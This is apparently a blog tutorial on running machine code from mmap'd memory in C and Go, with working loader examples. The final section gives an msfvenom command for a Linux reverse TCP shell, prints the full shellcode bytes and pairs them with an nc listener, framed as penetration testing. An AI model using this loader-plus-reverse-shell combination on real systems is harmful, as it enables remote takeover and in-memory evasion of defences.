Playing with MMap

Intro to mmap

mmap is a really awesome Linux system call for creating memory maps; basically a virtual buffer inside the address space of the calling process. It’s similar to VirtualAlloc on Windows and serves a similar purpose. It allows for a way to “map” files or devices into the current address space thereby treating a file or device as if it were inside RAM. This then bypasses the buffering and overhead that normal I/O operations would incur since the data would be available readily by being accessed in memory instead.

With a memory mapped file, file reading could be done as easily as shifting a pointer through memory and looking at the content; no need for explicit read() and write() calls. It’s also possible to create executable areas of memory, and then jump into the memory and run it as a part of the program. What’s super fascinating about this is that you can create programs that write other programs to memory and run them in-process. For example, you could write a compiler for your own language, and instead of compiling out an executable, just write the compiled bytes to a memory mapped file, and execute it in memory. This is the concept behind Just-In-Time (JIT) compilation.

Using mmap from C

C is an incredibly powerful language and it allows you to cast pointers to functions without complaint. Types are C’s way to pretend it has friendly developer ergonomics, meanwhile flexing it’s nonchalant attitude that bytes are just bytes and mean whatever the fuck you want them to mean.

There is not a lot to the mmap API and we’re going to be calling it like this:

void *mem =
      mmap(NULL, size, PROT_WRITE | PROT_READ, MAP_PRIVATE | MAP_ANON, -1, 0);

What we’re asking for here, according to the doco https://man7.org/linux/man-pages/man2/mmap.2.html is for the Linux kernel to find whatever spot it can of size size and mark it writeable, readable, private and anonymous…

By passing NULL in the address, the kernel makes the decision of where to create the map. Otherwise, we’d have to be aware of our own address space, and know what pointer we want to provide for where to create the map. In our case, I don’t care and kernel knows best.
size is the size in bytes, and I’ll show you where that comes from shortly.
PROT_WRITE and PROT_READ are just protection flags and this is what I pass as default since I know I want to both write and read from the map.
MAP_PRIVATE and MAP_ANON are beacuse it should be invisible to other processes (opposite of MAP_SHARED for example), and I want it to be anonymous, meaning it’s not actually backed by anything on disk.
Since we passed the MAP_ANON flag, we then pass -1 as the file descriptor since there is no backing file.
We pass 0 for the offset, since there is no offset and no backing file to offset into anyway.

Once we have a pointer to our memory mapped in-memory file, we just call memcpy to get our data into it. However, even if we cast it to a function now, we can’t actually call it. Calling it would require the instruction pointer landing in the memory to start executing and the kernel will never allow this unless the area is marked as executable. So we need another Linux syscall called mprotect for this which is just short for memory protect. It does the same thing to the memory pointed at, as what mmap does to it with the protection flags. mprotect has doco at https://man7.org/linux/man-pages/man2/mprotect.2.html

int res = mprotect(mem, size, PROT_EXEC | PROT_READ);

This time we are asking for the same memory to be re-protected as executable and readable. Most systems will require executable memory to also be readable and that makes sense. res will hold the return code which should be 0 if everything went well. So now that we have a way of creating an executable bit of memory, we need to be able to actually execute it. In C, this is straightforward. We create a type of function, then cast the pointer we have to be an instance of that function, then call it:

// Firstly, create the defintion, called Func, because naming is hard
typedef int (*Func)();
// Cast the pointer to our Func
Func func = (Func)mem;
// Then call it
func();

Now, the reason I created Func as a function that returns an int is because of the code I was trying to run in memory. Using FASM, I created the bytes I care about (code.asm):

use64
format binary 

mov rax, 69
ret

And then compiled it with fasm code.asm. cat code.bin | xxd -p gives the raw bytes to populate in the calling C code. This FASM code simply puts 69 in the rax register, which is used as the return value register, and then called ret which is exactly equivalent to C’s return and it pops the address off the call stack to return to the C code firing point. Since the assembly returns an integer, the C equivalent function we are casting to must expect and integer return.

The full working code in C is:

#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

typedef int (*Func)();

int main() {
  uint8_t code[] = {0x48, 0xc7, 0xc0, 0x45, 0x00, 0x00, 0x00, 0xc3};
  size_t size = sizeof(code) / sizeof(code[0]);

  void *mem =
      mmap(NULL, size, PROT_WRITE | PROT_READ, MAP_PRIVATE | MAP_ANON, -1, 0);

  if (NULL == mem) {
    printf("Failed to map memory\n");
    return 1;
  }

  memcpy(mem, code, size);

  int res = mprotect(mem, size, PROT_EXEC | PROT_READ);
  if (res != 0) {
    printf("Failed to make memory executable!\n");
    return 2;
  }

  Func func = (Func)mem;

  return func();
}

And it is compilable and runnable as this:

gcc -o test -lc test.c && ./test; echo $?
69

This gives us the expected return code of 69. Pretty straight forward.

If you’re like me, then this seems pretty cool, but you may not want to do this in C even though this specifically is easy. The rest of C often offers more pain than value. Let’s do it in Golang instead!

Using mmap from Golang

Golang makes this process a bit harder. You can definitely use mmap and mprotect easily enough since the unix libraries exist and they map almost 1:1 to the actual syscalls. They’re the easy part:

// mmap call
mem, err := unix.Mmap(-1, 0, len(code), unix.PROT_WRITE|unix.PROT_READ, unix.MAP_PRIVATE|unix.MAP_ANON)
// mprotect call
err := unix.Mprotect(mem, unix.PROT_READ|unix.PROT_EXEC)

The order of arguments has changed slightly for mmap and the file descriptor and offsets come first, and mprotect no longer needs the size, just the slice reference.

However, Golang does not match the same calling convention as C. https://go.dev/src/cmd/compile/abi-internal Notice the complicated rules for how calling works in Golang? It actually makes a lot of sense and there is nothing bad at all in the way Golang does this; it’s perfect for Golang, but means there is some difficulty with simply calling raw bytes as a function. We now have a multi-step process to go from bytes to function in Golang.

Firstly, when you call mmap in Golang, the result, even though it’s a []byte is not just an area of memory that is an array of bytes like in C. It’s a Golang slice. This is a Golang construct that manages it’s own length and capacity since it is effectively a dynamic array. So the []byte you get back is a slice, and not a pointer to an area of memory. However, the actual pointer is there and we can get it by unwrapping an unsafe pointer to the slice, as a slice struct of equivalent shape to the actual Golang slice, then cast the internal data pointer to a function. So we build these two structures first to be our representation of Golang’s internal function and slices:

type fn struct {
	ptr uintptr
}

type slice struct {
	Data uintptr
	Len  int
	Cap  int
}

So when we have a Golang slice, we now have to effectively unmarshall it as our slice representation, extract the pointer to it’s data and use it to construct our representation of a function, fn, then cast it to a higher level Golang func:

s := (*slice)(unsafe.Pointer(&mem))
f := &fn{ptr: s.Data}
execFn := *(*func() int)(unsafe.Pointer(&f))

I think this is truly fascinating because you have to understand how Golang is actually representing slices and functions otherwise the conversion would be impossible. We can now run the function we’ve created by calling execFn(). For this demo, I’m using the same FASM generated assembly as before:

package main

import (
	"fmt"
	"os"
	"unsafe"

	"golang.org/x/sys/unix"
)

type fn struct {
	ptr uintptr
}

type slice struct {
	Data uintptr
	Len  int
	Cap  int
}

func main() {
	code := []byte{0x48, 0xc7, 0xc0, 0x45, 0x00, 0x00, 0x00, 0xc3}
	mem, err := unix.Mmap(-1, 0, len(code), unix.PROT_WRITE|unix.PROT_READ, unix.MAP_PRIVATE|unix.MAP_ANON)
	if err != nil {
		fmt.Println(err)
		os.Exit(1)
	}

	n := copy(mem, code)
	if n != len(code) {
		fmt.Println("Failed to copy entire code into mmap")
		os.Exit(2)
	}

	if err := unix.Mprotect(mem, unix.PROT_READ|unix.PROT_EXEC); err != nil {
		fmt.Println(err)
		os.Exit(3)
	}

	s := (*slice)(unsafe.Pointer(&mem))
	f := &fn{ptr: s.Data}
	execFn := *(*func() int)(unsafe.Pointer(&f))

	os.Exit(execFn())
}

You will need to go get "golang.org/x/sys/unix" to make sure you have the required unix package first, otherwise, Mmap and Mprotect won’t be available to you. Finally, run the code:

go run main.go
exit status 69

We have got our exit code as expected.

Next steps

This can be extended to other uses, especially in penetration testing for example. It’s trivial to generate a reverse shell in msfvenom and get the raw bytes and use this instead for a more interesting example.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -b "\x00" --encoder none 2>/dev/null | xxd -p -c 0 | sed 's/../0x&,/g; s/,$//'

This will give a payload of:

0x6a,0x29,0x58,0x99,0x6a,0x02,0x5f,0x6a,0x01,0x5e,0x0f,0x05,0x48,0x97,0x48,0xb9,0x02,0x00,0x11,0x5c,0x7f,0x00,0x00,0x01,0x51,0x48,0x89,0xe6,0x6a,0x10,0x5a,0x6a,0x2a,0x58,0x0f,0x05,0x6a,0x03,0x5e,0x48,0xff,0xce,0x6a,0x21,0x58,0x0f,0x05,0x75,0xf6,0x6a,0x3b,0x58,0x99,0x48,0xbb,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x53,0x48,0x89,0xe7,0x52,0x57,0x48,0x89,0xe6,0x0f,0x05

We can catch the reverse shell using nc -lnvp 4444 in one terminal, and run go run main.go in another.